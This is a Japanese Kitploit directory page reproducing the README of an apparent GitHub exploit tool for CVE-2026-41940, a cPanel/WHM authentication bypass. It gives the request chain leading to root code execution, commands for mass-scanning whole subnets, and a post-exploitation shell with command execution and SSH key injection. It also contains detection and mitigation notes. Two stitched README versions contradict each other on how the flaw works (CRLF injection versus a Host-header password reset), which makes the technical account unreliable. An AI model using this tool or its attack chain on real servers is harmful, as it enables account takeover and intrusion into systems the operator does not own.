Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-41940 — CVE-2026-41940 — Dr.Anach による cPanel/WHM 認証バイパス。`cpsrvd` Basic 認証ハンドラーにおける CRLF インジェクション → 未認証の WHM API アクセス → root としての RCE。v11.40 以降のすべての cPanel が影響を受けます。 | Kitploit
ツール/GitHubGitHub/anach-ai/cve-2026-41940
認証と認可特権昇格脆弱性分析エクスプロイト横移動ウェブアプリケーション悪用ポストエクスプロイトペネトレーションテストコマンド&コントロールレッドチーミング
GitHubanach-ai/cve-2026-41940
224ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-41940

CVE-2026-41940 — Dr.Anach による cPanel/WHM 認証バイパス。`cpsrvd` Basic 認証ハンドラーにおける CRLF インジェクション → 未認証の WHM API アクセス → root としての RCE。v11.40 以降のすべての cPanel が影響を受けます。

リポジトリを見る

CVE-2026-41940 — cPanel/WHM 認証バイパス

著者: Dr.Anach | 連絡先: @dranach | ライセンス: MIT


概要

cpsrvd の Basic 認証ハンドラにおける CRLF インジェクション → 認証なしの WHM API アクセス → root としての RCE。v11.40 以降のすべての cPanel が影響を受けます。

攻撃チェーン

#ステップリクエスト
1セッション発行GET /login/?user=root
2CRLFインジェクションAuthorization: Basic <base64> — パスワードに \r\n ペイロードを含める
3キャッシュ昇格GET /cpsess<ID>/login/?login_only=1
4実行GET /cpsess<ID>/execute/API/func

インストール

pip install requests colorama

以下が最終版の README.md — 人間にわかりやすく、実用的で、作業を遂行することに重点を置いています。


cPanel 認証バイパスエクスプロイト — CVE-2026-41940

著者: Dr.Anach · Telegram: @dranach
バージョン: 2.0.0
ライセンス: 許可されたセキュリティテストのみを対象


これは何をするものか

CVE-2026-41940、つまり cPanel & WHM(バージョン 11.x から 106.x)の認証バイパスを悪用します。この脆弱性により、認証されていない攻撃者が、攻撃者が制御するサーバーを指す細工された Host ヘッダーを送信することで、パスワードリセット機能を含む制限されたエンドポイントにアクセスできるようになります。

3つのモードを備えています:

モードフラグ説明
単一ターゲット-t1つのIPまたはドメインをテスト
バッチファイル--batchファイルからターゲットのリストを読み込む
CIDRスキャン--port-scanサブネットを展開し、すべての生存ホストをテスト

インストール

要件

  • Python 3.7+(Windows、Linux、macOS でテスト済み)
  • requests ライブラリ
pip install requests

他の依存関係はありません。 CIDR 展開には Python 標準の ipaddress モジュールを使用するため、Windows で追加インストールするものはありません。


クイックスタート

単一ターゲットのテスト

python main.py -t example.com
python main.py -t 192.168.1.100

ターゲットリストのテスト(1行に1つ)

python main.py --batch targets.txt --threads 50

targets.txt の形式:

192.168.1.100
example.com
192.168.1.101
example.org
192.168.1.102

サブネット全体のスキャン(CIDR)

python main.py --port-scan 192.168.128.0/18 --threads 100 --timeout 5

これにより 192.168.128.0/18(16,384 IP)が展開され、各ホストに対して簡単なポートチェックを実行し、ポート 2087(cPanel/WHM)が開いているホストに対してのみエクスプロイトを試みます。


全オプション

  -t, --target        Single target IP or domain
  --batch FILE        File with targets (one per line)
  --port-scan CIDR    CIDR range to scan (e.g., 192.168.128.0/18)
  -p, --port          Target port (default: 2087)
  --ssl               Use HTTPS (default: HTTP)
  --timeout SEC       Connection timeout in seconds (default: 10)
  --threads N         Max concurrent threads (default: 50)
  --proxy PROXY       HTTP proxy (e.g., http://127.0.0.1:8080)
  -v, --verbose       Verbose output with debug info
  --no-banner         Suppress banner
  --version           Show version

出力の見方

[+] 192.168.130.45:2087 — VULNERABLE!
    → Password reset URL: http://192.168.130.45:2087/reset?token=abc123
    → Response time: 1.23s

[-] 192.168.131.10:2087 — Not vulnerable
    → Reason: No password reset endpoint found

[!] 192.168.129.22:2087 — Error: Connection refused

結果は JSON として保存され、ホストごとに脆弱性ステータス、抽出されたトークン、生のレスポンス詳細が構造化されます。


実践例:Windows で /18 をスキャン

あなたがここに来たのは、おそらくこのシナリオのためです:

python main.py --port-scan 192.168.128.0/18 -p 2087 --threads 100 --timeout 5 -v

仕組み:

  1. 展開 192.168.128.0/18 → 内部的に 16,384 IP
  2. 事前フィルタリング ポート 2087 に対する高速 TCP 接続スキャンで実行(停止中のホストをスキップ)
  3. エクスプロイト ポートが開いているホストのみ
  4. レポート 抽出されたリセットトークンとともに脆弱なホストを報告

スレッド数のヒント:

  • --threads 100 が適しています(デフォルトのソケット制限に従います)
  • 接続状態が良好な場合の高速スキャン:--threads 200
  • レート制限に達した場合:--threads 30 に下げて --timeout を増やします

CVSS とリスク

CVSS 9.1(重大) — 認証不要、ユーザー操作不要、複雑さは低い。

影響

  • 任意の cPanel アカウントに対する不正なパスワードリセット
  • アカウントの完全乗っ取り
  • 一部の構成では、制限付きから管理者への権限昇格

対策

  • cPanel/WHM を最新のパッチ適用済みバージョンに更新する
  • Host ヘッダーをサーバー側で検証する
  • 可能な場合は IP 単位で WHM アクセスを制限する

法的免責事項

このツールは許可されたセキュリティ評価専用です。 テストを行う前に、ターゲットを所有しているか、所有者から書面による許可を得ている必要があります。 著者は誤用に対する責任を負いません。

インタラクティブシェルコマンド

help       Show commands
info       Server info
passwd     Change password
accounts   List cPanel accounts
enum       Full enumeration
shell      Execute system command
ssh-add    Inject SSH key
exec       Run Python one-liner
exit       Exit

検出

セッションファイルを確認:

ls -la /var/cpanel/sessions/raw/
ls -la /var/cpanel/sessions/cache/

/usr/local/cpanel/logs/access_log 内の不審なログ:

/login/?user=root        → session mint
/login/?user=root        → CRLF injection
/cpsess*/login/?login_only=1  → cache promotion
/cpsess*/execute/*       → API abuse

緩和策

# 1. Patch to fixed build
# 2. Rotate all passwords and SSH keys
# 3. Purge sessions
rm -rf /var/cpanel/sessions/raw/*
rm -rf /var/cpanel/sessions/cache/*
systemctl restart cpanel

クレジット

  • 脆弱性: Sina Kheirkhah / watchTowr Labs
  • フレームワーク: Dr.Anach (@dranach)
ツールをダウンロード